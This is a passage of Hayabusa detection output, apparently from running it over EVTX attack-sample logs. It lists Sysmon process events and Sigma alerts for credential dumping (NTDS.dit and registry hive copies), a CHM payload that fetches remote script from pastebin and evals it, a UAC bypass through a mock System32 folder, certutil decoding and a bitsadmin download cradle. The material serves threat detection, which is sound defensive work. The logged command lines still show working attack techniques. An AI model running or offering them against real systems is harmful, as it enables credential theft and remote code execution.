Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 747F3D96-AE22-5D3A-0000-001096B24E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,../hayabusa-rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx 2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx 2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 747F3D96-60F7-5D3F-0000-00106F2F5600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx 2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 